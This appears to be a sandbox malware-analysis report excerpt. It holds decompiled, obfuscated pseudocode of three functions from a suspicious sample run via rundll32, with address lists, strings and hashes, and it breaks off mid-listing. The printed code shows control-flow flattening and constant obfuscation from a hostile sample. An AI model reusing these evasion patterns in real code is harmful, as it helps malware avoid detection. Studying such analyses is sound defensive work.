0x0021134f
0x00211357
0x0021135f
0x00211367
0x0021136f
0x00211377
0x0021137f
0x0021138b
0x00211390
0x00211396
0x0021139e
0x002113a6
0x002113ab
0x002113b3
0x002113bb
0x002113c0
0x002113c5
0x002113c6
0x002113ca
0x002113d2
0x002113da
0x002113e2
0x002113e7
0x002113ef
0x002113fc
0x00211400
0x00211405
0x0021140d
0x00211415
0x0021141a
0x00211422
0x0021142a
0x00211432
0x0021143a
0x00211442
0x0021144a
0x00211457
0x0021145b
0x00211463
0x00211471
0x00211475
0x0021147d
0x00211485
0x0021148a
0x00211492
0x0021149a
0x002114a2
0x002114aa
0x002114b2
0x002114c3
0x002114d0
0x002114d9
0x002114e1
0x002114e9
0x002114f9
0x002114fd
0x00211505
0x00211509
0x0021150e
0x00211514
0x0021151c
0x00211524
0x0021152d
0x00211532
0x00211538
0x00211540
0x00211548
0x00211550
0x0021155d
0x0021155e
0x00211562
0x0021156a
0x00211572
0x00211580
0x00211584
0x0021158c
0x00211594
0x0021159c
0x002115a0
0x002115a5
0x002115ad
0x002115b5
0x002115bd
0x002115c5
0x002115cd
0x002115d5
0x002115dd
0x002115e5
0x002115ed
0x002115f5
0x002115fd
0x002115fd
0x00211607
0x00211713
0x00211718
0x00000000
0x00211718
0x00211613
0x00211747
0x00211750
0x00211752
0x00000000
0x00211767
0x0021161f
0x002116b9
0x002116bf
0x002116e0
0x002116f0
0x002116f4
0x002116fc
0x002116fd
0x00211702
0x00211705
0x00000000
0x00211705
0x0021162b
0x0021169b
0x002116a2
0x002116a9
0x00000000
0x002116a9
0x0021162d
0x0021162f
0x00000000
0x00000000
0x00211635
0x00211642
0x00211647
0x00211659
0x00211666
0x00211670
0x00211676
0x00211689
0x0021168e
0x00211691
0x00211691
0x00211723
0x00211728
0x0021172a
0x0021172a
0x0021172a
0x00000000

Strings

B, xrefs: 00211405
n2, xrefs: 00211475
IP, xrefs: 002113CA
ld8, xrefs: 00211505
k, xrefs: 00211309
+, xrefs: 00211492
m , xrefs: 002113C0, 0021170F, 002116F0, 00211659
j_, xrefs: 0021139E

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: m $+$IP$j_$k$ld8$n2$B
API String ID: 0-4100556268
Opcode ID: a155304bc2eafce7f1fc9be6d4cfc877f21265ceefb3aebc3185c4d35460f22d
Instruction ID: 4021ca93c9ec6f8d72e524994a240e6cb9c1637b239624bccd5952d52f1bb7db
Opcode Fuzzy Hash: a155304bc2eafce7f1fc9be6d4cfc877f21265ceefb3aebc3185c4d35460f22d
Instruction Fuzzy Hash: A4B14F71118381DFD368CF21C58995FBBE1BBC4758F508A1EF296862A0C7B58A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00217F1F, Relevance: 10.2, Strings: 8, Instructions: 237
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00217F1F(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t229;
				void* _t232;
				void* _t233;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t246;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t271;
				void* _t272;
				signed int* _t274;
				void* _t277;

				_t274 =  &_v104;
				_v16 = 0x432510;
				_v12 = 0x57033b;
				_v8 = 0x70a374;
				_t271 = 0;
				_t247 = __ecx;
				_v4 = 0;
				_t272 = 0x285a15;
				_v52 = 0x28a8;
				_v52 = _v52 << 0xb;
				_t249 = 0x64;
				_v52 = _v52 / _t249;
				_v52 = _v52 ^ 0x00032641;
				_v56 = 0x58c1;
				_v56 = _v56 ^ 0x08ae2152;
				_v56 = _v56 ^ 0xe42bbac7;
				_v56 = _v56 ^ 0xec85f018;
				_v60 = 0x32b9;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x4ab7c61f;
				_v60 = _v60 ^ 0x4ab7bf69;
				_v88 = 0xcc29;
				_v88 = _v88 << 7;
				_v88 = _v88 >> 0xe;
				_t250 = 0x27;
				_v88 = _v88 * 0x71;
				_v88 = _v88 ^ 0x00008073;
				_v28 = 0x82bf;
				_v28 = _v28 / _t250;
				_v28 = _v28 ^ 0x0000421a;
				_v80 = 0xde89;
				_v80 = _v80 | 0x25f7ab60;
				_v80 = _v80 + 0xffffb767;
				_v80 = _v80 ^ 0x25f7d2d5;
				_v84 = 0xb172;
				_v84 = _v84 | 0x58f01ffb;
				_v84 = _v84 ^ 0x6aa9a845;
				_v84 = _v84 | 0x8208c103;
				_v84 = _v84 ^ 0xb259d8d2;
				_v48 = 0xe27e;
				_v48 = _v48 | 0xfee9bf5f;
				_v48 = _v48 ^ 0xfee98d98;
				_v64 = 0x40d4;
				_v64 = _v64 + 0xfffff13c;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x00321441;
				_v68 = 0x6862;
				_v68 = _v68 + 0x864e;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x0007582b;
				_v92 = 0x5758;
				_v92 = _v92 | 0xff7df76f;
				_t251 = 0x39;
				_v92 = _v92 / _t251;
				_v92 = _v92 ^ 0x047b2a85;
				_v96 = 0x40be;
				_v96 = _v96 | 0xd59932a3;
				_v96 = _v96 << 0xb;
				_v96 = _v96 * 0x52;
				_v96 = _v96 ^ 0x36096eff;
				_v72 = 0x18a0;
				_v72 = _v72 + 0x45e5;
				_v72 = _v72 + 0xffff9352;
				_v72 = _v72 ^ 0xffff81db;
				_v100 = 0x6e96;
				_v100 = _v100 * 0x3a;
				_v100 = _v100 << 0x10;
				_v100 = _v100 ^ 0x7246fe44;
				_v100 = _v100 ^ 0x7fbac885;
				_v104 = 0x65cf;
				_v104 = _v104 / _t251;
				_v104 = _v104 ^ 0xf75b4ca1;
				_t252 = 0x48;
				_v104 = _v104 / _t252;
				_v104 = _v104 ^ 0x036f7b06;
				_v76 = 0x2c53;
				_t253 = 0x57;
				_v76 = _v76 * 0x11;
				_v76 = _v76 ^ 0x6f057687;
				_v76 = _v76 ^ 0x6f07c581;
				_v24 = 0x7097;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x000060b2;
				_v36 = 0x9151;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x43d947ca;
				_v36 = _v36 ^ 0xd2881410;
				_v40 = 0x482c;
				_v40 = _v40 + 0xffffb888;
				_v40 = _v40 << 1;
				_v40 = _v40 ^ 0x00000914;
				_v44 = 0x389f;
				_v44 = _v44 * 0x76;
				_v44 = _v44 * 0x18;
				_v44 = _v44 ^ 0x02723fe4;
				_v32 = 0x2aa8;
				_v32 = _v32 * 0x38;
				_v32 = _v32 ^ 0x551469c6;
				_v32 = _v32 ^ 0x551d1a3f;
				_v20 = 0xfc56;
				_v20 = _v20 / _t253;
				_v20 = _v20 ^ 0x000001b5;
				goto L1;
				do {
					while(1) {
						L1:
						_t277 = _t272 - 0x17308d28;
						if(_t277 > 0) {
							break;
						}
						if(_t277 == 0) {
							_push(_t253);
							_t236 = E00217F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x2b65fd67;
							_t271 = _t271 + _t236;
							continue;
						} else {
							if(_t272 == 0x285a15) {
								_t272 = 0x27256339;
								continue;
							} else {
								if(_t272 == 0x30e9834) {
									_t253 = _v72;
									_t238 = E0020D64E(_t253, _v100, _v104, _t247 + 0x18, _v76);
									_t274 =  &(_t274[3]);
									_t272 = 0x1bffcccd;
									_t271 = _t271 + _t238;
									continue;
								} else {
									if(_t272 == 0x527ec93) {
										_push(_t253);
										_t241 = E00217F1B();
										_t274 =  &(_t274[1]);
										_t272 = 0x1cfcffb7;
										_t271 = _t271 + _t241;
										continue;
									} else {
										if(_t272 != 0x60183f8) {
											goto L21;
										} else {
											_push(_v32);
											_t271 = _t271 + E00217F1B();
										}
									}
								}
							}
						}
						L8:
						return _t271;
					}
					if(_t272 == 0x1bffcccd) {
						_t253 = _v24;
						_t229 = E0020D64E(_t253, _v36, _v40, _t247 + 0x20, _v44);
						_t274 =  &(_t274[3]);
						_t272 = 0x60183f8;
						_t271 = _t271 + _t229;
						goto L21;
					} else {
						if(_t272 == 0x1cfcffb7) {
							_push(_t253);
							_t232 = E00217F1B();
							_t274 =  &(_t274[1]);
							_t272 = 0x17308d28;
							_t271 = _t271 + _t232;
							goto L1;
						} else {
							if(_t272 == 0x27256339) {
								_t253 = _v52;
								_t233 = E0020D64E(_t253, _v56, _v60, _t247, _v88);
								_t274 =  &(_t274[3]);
								_t272 = 0x527ec93;
								_t271 = _t271 + _t233;
								goto L1;
							} else {
								if(_t272 != 0x2b65fd67) {
									goto L21;
								} else {
									_push(_t253);
									_t246 = E00217F1B();
									_t274 =  &(_t274[1]);
									_t272 = 0x30e9834;
									_t271 = _t271 + _t246;
									goto L1;
								}
							}
						}
					}
					goto L8;
					L21:
				} while (_t272 != 0x28759a70);
				goto L8;
			}

0x00217f1f
0x00217f22
0x00217f2c
0x00217f34
0x00217f40
0x00217f42
0x00217f44
0x00217f48
0x00217f4d
0x00217f55
0x00217f60
0x00217f65
0x00217f6b
0x00217f73
0x00217f7b
0x00217f83
0x00217f8b
0x00217f93
0x00217f9b
0x00217fa0
0x00217fa8
0x00217fb0
0x00217fb8
0x00217fbd
0x00217fc7
0x00217fca
0x00217fce
0x00217fd6
0x00217fe6
0x00217fea
0x00217ff2
0x00217ffa
0x00218002
0x0021800a
0x00218012
0x0021801a
0x00218022
0x0021802a
0x00218032
0x0021803a
0x00218042
0x0021804a
0x00218052
0x0021805a
0x00218062
0x00218067
0x0021806f
0x00218077
0x0021807f
0x00218084
0x0021808c
0x00218094
0x002180a0
0x002180a3
0x002180a7
0x002180af
0x002180b7
0x002180bf
0x002180c9
0x002180cd
0x002180d5
0x002180dd
0x002180e5
0x002180ed
0x002180f5
0x0021810b
0x0021810f
0x00218114
0x0021811c
0x00218124
0x00218134
0x00218138
0x00218144
0x00218149
0x0021814f
0x00218157
0x00218164
0x00218165
0x00218169
0x00218171
0x00218179
0x00218181
0x00218186
0x0021818e
0x00218196
0x0021819b
0x002181a3
0x002181ab
0x002181b3
0x002181bb
0x002181bf
0x002181c7
0x002181d4
0x002181dd
0x002181e1
0x002181e9
0x002181f6
0x002181fa
0x00218202
0x0021820a
0x00218218
0x0021821c
0x0021821c
0x00218224
0x00218224
0x00218224
0x00218224
0x00218226
0x00000000
0x00000000
0x0021822c
0x002182c7
0x002182c8
0x002182cd
0x002182d0
0x002182d5
0x00000000
0x00218232
0x00218238
0x002182b5
0x00000000
0x0021823a
0x00218240
0x0021829d
0x002182a1
0x002182a6
0x002182a9
0x002182ae
0x00000000
0x00218242
0x00218248
0x0021827b
0x0021827c
0x00218281
0x00218284
0x00218289
0x00000000
0x0021824a
0x00218250
0x00000000
0x00218256
0x0021825e
0x00218267
0x00218267
0x00218250
0x00218248
0x00218240
0x00218238
0x00218269
0x00218272
0x00218272
0x002182e2
0x00218368
0x0021836c
0x00218371
0x00218374
0x00218379
0x00000000
0x002182e4
0x002182ea
0x00218346
0x00218347
0x0021834c
0x0021834f
0x00218351
0x00000000
0x002182ec
0x002182f2
0x00218326
0x0021832a
0x0021832f
0x00218332
0x00218337
0x00000000
0x002182f4
0x002182fa
0x00000000
0x002182fc
0x00218304
0x00218305
0x0021830a
0x0021830d
0x00218312
0x00000000
0x00218312
0x002182fa
0x002182f2
0x002182ea
0x00000000
0x0021837b
0x0021837b
0x00000000

Strings

daring agent is awakened due to calendars needing expansion.%n%nFor more information, click http://www.microsoft.com/contentredi, xrefs: 0021823A, 0021830D
bh, xrefs: 0021806F
,H, xrefs: 002181AB
XW, xrefs: 0021808C
S,, xrefs: 00218157
9c%', xrefs: 002182EC
~, xrefs: 0021803A
9c%', xrefs: 002182B5

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,H$9c%'$9c%'$S,$XW$bh$daring agent is awakened due to calendars needing expansion.%n%nFor more information, click http://www.microsoft.com/contentredi$~
API String ID: 0-2928288003
Opcode ID: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction ID: f2fcbc4ddae74f006c51d96f65e4ee5c20476c5e33cab3832452d3b3ecfe5545
Opcode Fuzzy Hash: 05e83836a57fa440519eb3f5be009a2ce7a5dbf4ce8713060be9fef2b7fd4d97
Instruction Fuzzy Hash: E9B141B29183818BD358CF25C98944BFBF2BBD4744F00891DF58696260D7B6D949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020B75F, Relevance: 10.2, Strings: 8, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0020B75F() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t216;
				intOrPtr* _t217;
				void* _t218;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				void* _t236;
				void* _t241;
				void* _t265;
				signed int* _t269;

				_t269 =  &_v88;
				_v64 = 0xcca9;
				_v64 = _v64 | 0x3d0c477d;
				_v64 = _v64 + 0x3ec7;
				_v64 = _v64 ^ 0xbd0d0ec5;
				_v60 = 0x38c3;
				_v60 = _v60 << 4;
				_v60 = _v60 >> 6;
				_v60 = _v60 ^ 0x00000e32;
				_v88 = 0xa439;
				_v88 = _v88 + 0x34d8;
				_v88 = _v88 << 0xe;
				_v4 = 0;
				_v88 = _v88 * 0x46;
				_t265 = 0x32863a22;
				_v88 = _v88 ^ 0xd6a9fef0;
				_v32 = 0x5041;
				_v32 = _v32 ^ 0x94936571;
				_v32 = _v32 ^ 0x94934631;
				_v52 = 0x47aa;
				_t228 = 0x6b;
				_v52 = _v52 * 0x59;
				_v52 = _v52 / _t228;
				_v52 = _v52 ^ 0x00001934;
				_v76 = 0x9d13;
				_v76 = _v76 | 0xffbf7fdf;
				_t229 = 0x4b;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0xf1ffac33;
				_v56 = 0x2528;
				_v56 = _v56 ^ 0xff11bbbe;
				_v56 = _v56 / _t229;
				_v56 = _v56 ^ 0x0366a499;
				_v80 = 0x942e;
				_t230 = 0x65;
				_v80 = _v80 / _t230;
				_v80 = _v80 << 0x10;
				_v80 = _v80 ^ 0x4cc19e00;
				_v80 = _v80 ^ 0x4db6b316;
				_v28 = 0xb3;
				_t231 = 0x4f;
				_v28 = _v28 / _t231;
				_v28 = _v28 ^ 0x00007dc1;
				_v84 = 0xb6fa;
				_t232 = 0x7e;
				_v84 = _v84 * 0x7b;
				_v84 = _v84 + 0x74c4;
				_v84 = _v84 + 0xffff1df9;
				_v84 = _v84 ^ 0x005758b1;
				_v48 = 0xb943;
				_v48 = _v48 / _t232;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x005e2ced;
				_v24 = 0x593;
				_t233 = 0x59;
				_t225 = _v4;
				_v24 = _v24 * 0x2c;
				_v24 = _v24 ^ 0x0000804c;
				_v72 = 0xf7ad;
				_v72 = _v72 / _t233;
				_v72 = _v72 << 8;
				_v72 = _v72 + 0xb94c;
				_v72 = _v72 ^ 0x0003edcb;
				_v20 = 0xede5;
				_t234 = 0x17;
				_v20 = _v20 / _t234;
				_v20 = _v20 ^ 0x00002281;
				_v40 = 0x2895;
				_v40 = _v40 << 7;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0x144a8d7d;
				_v44 = 0x7178;
				_v44 = _v44 >> 0xa;
				_t235 = 0xf;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x00005c52;
				_v68 = 0xc8ae;
				_v68 = _v68 | 0xfda66fe8;
				_v68 = _v68 << 0xa;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x04dddb27;
				_v12 = 0xea07;
				_v12 = _v12 + 0xffffa6b0;
				_v12 = _v12 ^ 0x0000adca;
				_v16 = 0x7743;
				_v16 = _v16 | 0x2d86c018;
				_v16 = _v16 ^ 0x2d86a9dd;
				_v36 = 0x116e;
				_v36 = _v36 >> 0xc;
				_v36 = _v36 ^ 0x542dd378;
				_v36 = _v36 ^ 0x542dcb57;
				while(1) {
					L1:
					_t236 = 0x5c;
					_t216 = 0x1a27fc18;
					do {
						while(_t265 != 0x14fc2c0b) {
							if(_t265 == _t216) {
								_t217 = E0020E22B(_v20, _v40, _v8, _t225, _v44);
								_t269 =  &(_t269[3]);
								__eflags = _t217;
								_t265 = 0x35b0a114;
								_v4 = 0 | __eflags == 0x00000000;
								goto L1;
							} else {
								if(_t265 == 0x2364314f) {
									_push(_v32);
									_t218 = E0021889D(0x21c9d0, _v88, __eflags);
									_pop(_t241);
									__eflags = E00213EB3(_v52, _t241, _t218, _v76, _v56, 0x21c9d0, _v80, _v28, 0x21c9d0, _v84, 0x21c9d0, _v60, _v64,  &_v8);
									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
									E00212025(_v48, _t218, _v24, _v72);
									_t269 =  &(_t269[0xf]);
									_t236 = 0x5c;
									L16:
									_t216 = 0x1a27fc18;
									goto L17;
								} else {
									if(_t265 == 0x32863a22) {
										_t265 = 0x14fc2c0b;
										continue;
									} else {
										if(_t265 != 0x35b0a114) {
											goto L17;
										} else {
											E002065A2(_v8, _v68, _v12, _v16, _v36);
										}
									}
								}
							}
							L8:
							return _v4;
						}
						_t226 =  *0x21ca2c; // 0x495cc8
						_t227 = _t226 + 0x230;
						while(1) {
							__eflags =  *_t227 - _t236;
							if( *_t227 == _t236) {
								break;
							}
							_t227 = _t227 + 2;
							__eflags = _t227;
						}
						_t225 = _t227 + 2;
						__eflags = _t227 + 2;
						_t265 = 0x2364314f;
						goto L16;
						L17:
						__eflags = _t265 - 0x34b93fb8;
					} while (__eflags != 0);
					goto L8;
				}
			}

0x0020b75f
0x0020b762
0x0020b76c
0x0020b776
0x0020b77e
0x0020b786
0x0020b78e
0x0020b793
0x0020b798
0x0020b7a0
0x0020b7a7
0x0020b7ae
0x0020b7b2
0x0020b7be
0x0020b7c2
0x0020b7c7
0x0020b7cf
0x0020b7d7
0x0020b7df
0x0020b7e7
0x0020b7f6
0x0020b7f9
0x0020b805
0x0020b809
0x0020b811
0x0020b819
0x0020b826
0x0020b829
0x0020b82d
0x0020b835
0x0020b83d
0x0020b84d
0x0020b851
0x0020b859
0x0020b865
0x0020b86a
0x0020b870
0x0020b875
0x0020b87d
0x0020b885
0x0020b891
0x0020b896
0x0020b89c
0x0020b8a4
0x0020b8b1
0x0020b8b2
0x0020b8b6
0x0020b8be
0x0020b8c6
0x0020b8ce
0x0020b8dc
0x0020b8e0
0x0020b8e5
0x0020b8ed
0x0020b903
0x0020b906
0x0020b90a
0x0020b90e
0x0020b916
0x0020b926
0x0020b92a
0x0020b92f
0x0020b937
0x0020b93f
0x0020b94b
0x0020b950
0x0020b956
0x0020b95e
0x0020b966
0x0020b96b
0x0020b970
0x0020b978
0x0020b980
0x0020b989
0x0020b98c
0x0020b990
0x0020b998
0x0020b9a0
0x0020b9a8
0x0020b9ad
0x0020b9b2
0x0020b9ba
0x0020b9c2
0x0020b9ca
0x0020b9d2
0x0020b9da
0x0020b9e2
0x0020b9ea
0x0020b9f2
0x0020b9f7
0x0020b9ff
0x0020ba07
0x0020ba07
0x0020ba09
0x0020ba0a
0x0020ba0f
0x0020ba0f
0x0020ba19
0x0020bae9
0x0020baf0
0x0020baf3
0x0020baf5
0x0020bafd
0x00000000
0x0020ba1f
0x0020ba25
0x0020ba67
0x0020ba74
0x0020ba79
0x0020baaf
0x0020bac8
0x0020bacb
0x0020bad0
0x0020bad5
0x0020bb24
0x0020bb24
0x00000000
0x0020ba27
0x0020ba2d
0x0020ba63
0x00000000
0x0020ba2f
0x0020ba35
0x00000000
0x0020ba3b
0x0020ba4f
0x0020ba54
0x0020ba35
0x0020ba2d
0x0020ba25
0x0020ba57
0x0020ba62
0x0020ba62
0x0020bb06
0x0020bb0c
0x0020bb17
0x0020bb17
0x0020bb1a
0x00000000
0x00000000
0x0020bb14
0x0020bb14
0x0020bb14
0x0020bb1c
0x0020bb1c
0x0020bb1f
0x00000000
0x0020bb29
0x0020bb29
0x0020bb29
0x00000000
0x0020bb35

Strings

,^, xrefs: 0020B8E5
O1d#, xrefs: 0020BB1F
AP, xrefs: 0020B7CF
xq, xrefs: 0020B978
(%, xrefs: 0020B835
R\, xrefs: 0020B990
O1d#, xrefs: 0020BA1F
Cw, xrefs: 0020B9D2

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
API String ID: 0-1090126677
Opcode ID: 4a06b42b20efc5415fca9c8bbdd5c90a25f39c07464e44428ba3a64813d7cff6
Instruction ID: e48f9944ca7944ed385288b64256a701c090d7a582001dd5cfdc390bc7e3c0fb
Opcode Fuzzy Hash: 4a06b42b20efc5415fca9c8bbdd5c90a25f39c07464e44428ba3a64813d7cff6
Instruction Fuzzy Hash: 95A132B16093409FE359CF64C98A81BBBE2FBC4B58F50491DF185862A0D7B9CA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020EA4C, Relevance: 10.2, Strings: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0020EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* __ecx;
				void* _t188;
				void* _t219;
				intOrPtr* _t220;
				void* _t222;
				void* _t241;
				void* _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int* _t252;

				_t220 = _a12;
				_push(_a16);
				_t241 = __edx;
				_push(_t220);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0020602B(_t188);
				_v8 = 0x50f8de;
				_t242 = 0;
				_v4 = _v4 & 0;
				_t252 =  &(( &_v80)[6]);
				_v76 = 0x4711;
				_v76 = _v76 + 0x6e0d;
				_t222 = 0x302d2de5;
				_v76 = _v76 << 0x10;
				_v76 = _v76 | 0x353296c6;
				_v76 = _v76 ^ 0xb53e96c7;
				_v52 = 0x1390;
				_v52 = _v52 << 4;
				_v52 = _v52 | 0x6ec3950a;
				_t243 = 0x1f;
				_v52 = _v52 * 0x25;
				_v52 = _v52 ^ 0x024a5273;
				_v64 = 0xc0d5;
				_v64 = _v64 >> 3;
				_v64 = _v64 ^ 0x4ce1daf8;
				_v64 = _v64 + 0xffff0c87;
				_v64 = _v64 ^ 0x4ce0d906;
				_v24 = 0xb115;
				_v24 = _v24 / _t243;
				_v24 = _v24 ^ 0x000025ae;
				_v68 = 0xbf02;
				_v68 = _v68 >> 1;
				_v68 = _v68 >> 7;
				_v68 = _v68 | 0xaaaffe07;
				_v68 = _v68 ^ 0xaaaf82c8;
				_v72 = 0x967c;
				_v72 = _v72 ^ 0xbb45b93e;
				_t244 = 0x5e;
				_v72 = _v72 * 0x31;
				_v72 = _v72 | 0x543854ee;
				_v72 = _v72 ^ 0xdc3e0629;
				_v28 = 0xb197;
				_v28 = _v28 / _t244;
				_v28 = _v28 ^ 0x00005929;
				_v80 = 0xf6df;
				_v80 = _v80 * 0x2c;
				_v80 = _v80 + 0xffff5b03;
				_v80 = _v80 ^ 0xcc4f4477;
				_v80 = _v80 ^ 0xcc66b212;
				_v60 = 0x7f94;
				_v60 = _v60 * 0x70;
				_v60 = _v60 + 0xffff5d6f;
				_v60 = _v60 + 0xffffe912;
				_v60 = _v60 ^ 0x0037713c;
				_v40 = 0x7639;
				_v40 = _v40 ^ 0xf24db204;
				_v40 = _v40 * 0xf;
				_v40 = _v40 ^ 0x328e289a;
				_v20 = 0xd74f;
				_v20 = _v20 | 0xd22ad029;
				_v20 = _v20 ^ 0xd22a9d24;
				_v16 = 0xecd5;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0x0076152b;
				_v44 = 0x5bc3;
				_v44 = _v44 + 0x5ef7;
				_v44 = _v44 | 0x81401b0a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x00015921;
				_v32 = 0x3f29;
				_t245 = 0x22;
				_v32 = _v32 / _t245;
				_v32 = _v32 >> 0xd;
				_v32 = _v32 ^ 0x00005264;
				_v48 = 0x731;
				_v48 = _v48 | 0x306aed8f;
				_v48 = _v48 + 0xffff48d8;
				_t246 = 0x76;
				_v48 = _v48 / _t246;
				_v48 = _v48 ^ 0x0069195c;
				_v36 = 0x33bb;
				_t247 = 0x45;
				_v36 = _v36 / _t247;
				_v36 = _v36 + 0xffffe7cb;
				_v36 = _v36 ^ 0xfffff379;
				_v56 = 0xdfcb;
				_t248 = 0x48;
				_v56 = _v56 / _t248;
				_t249 = 0x3a;
				_v56 = _v56 / _t249;
				_v56 = _v56 * 0x52;
				_v56 = _v56 ^ 0x00005386;
				do {
					while(_t222 != 0x246653ae) {
						if(_t222 == 0x260f4fd2) {
							_push(_t222);
							_push(_t222);
							_t242 = E00208736(_v12);
							if(_t242 != 0) {
								_t222 = 0x246653ae;
								continue;
							}
						} else {
							if(_t222 == 0x2ff0f75c) {
								_t219 = E002159A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
								_t252 =  &(_t252[0xb]);
								if(_t219 != 0) {
									_t222 = 0x260f4fd2;
									continue;
								}
							} else {
								if(_t222 != 0x302d2de5) {
									goto L11;
								} else {
									_t222 = 0x2ff0f75c;
									continue;
								}
							}
						}
						goto L12;
					}
					E002159A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
					_t252 =  &(_t252[0xb]);
					 *_t220 = _v12;
					_t222 = 0x6a13bb9;
					L11:
				} while (_t222 != 0x6a13bb9);
				L12:
				return _t242;
			}

0x0020ea50
0x0020ea57
0x0020ea5b
0x0020ea5d
0x0020ea5e
0x0020ea62
0x0020ea66
0x0020ea68
0x0020ea6d
0x0020ea75
0x0020ea77
0x0020ea7b
0x0020ea7e
0x0020ea88
0x0020ea90
0x0020ea95
0x0020ea9a
0x0020eaa2
0x0020eaaa
0x0020eab2
0x0020eab7
0x0020eac6
0x0020eac9
0x0020eacd
0x0020ead5
0x0020eadd
0x0020eae2
0x0020eaea
0x0020eaf2
0x0020eafa
0x0020eb0a
0x0020eb0e
0x0020eb16
0x0020eb1e
0x0020eb22
0x0020eb27
0x0020eb2f
0x0020eb37
0x0020eb3f
0x0020eb4c
0x0020eb4d
0x0020eb51
0x0020eb59
0x0020eb61
0x0020eb6f
0x0020eb73
0x0020eb7b
0x0020eb88
0x0020eb8c
0x0020eb94
0x0020eb9c
0x0020eba4
0x0020ebb1
0x0020ebb5
0x0020ebbd
0x0020ebc5
0x0020ebcd
0x0020ebd5
0x0020ebe2
0x0020ebe6
0x0020ebee
0x0020ebf6
0x0020ebfe
0x0020ec06
0x0020ec10
0x0020ec15
0x0020ec1d
0x0020ec25
0x0020ec2d
0x0020ec35
0x0020ec3a
0x0020ec42
0x0020ec50
0x0020ec55
0x0020ec5b
0x0020ec60
0x0020ec68
0x0020ec70
0x0020ec78
0x0020ec84
0x0020ec89
0x0020ec8f
0x0020ec97
0x0020eca3
0x0020eca8
0x0020ecae
0x0020ecb6
0x0020ecbe
0x0020ecca
0x0020eccf
0x0020ecd9
0x0020ece1
0x0020ecea
0x0020ecee
0x0020ecf6
0x0020ecf6
0x0020ed04
0x0020ed65
0x0020ed66
0x0020ed70
0x0020ed76
0x0020ed78
0x00000000
0x0020ed78
0x0020ed06
0x0020ed0c
0x0020ed46
0x0020ed4b
0x0020ed50
0x0020ed52
0x00000000
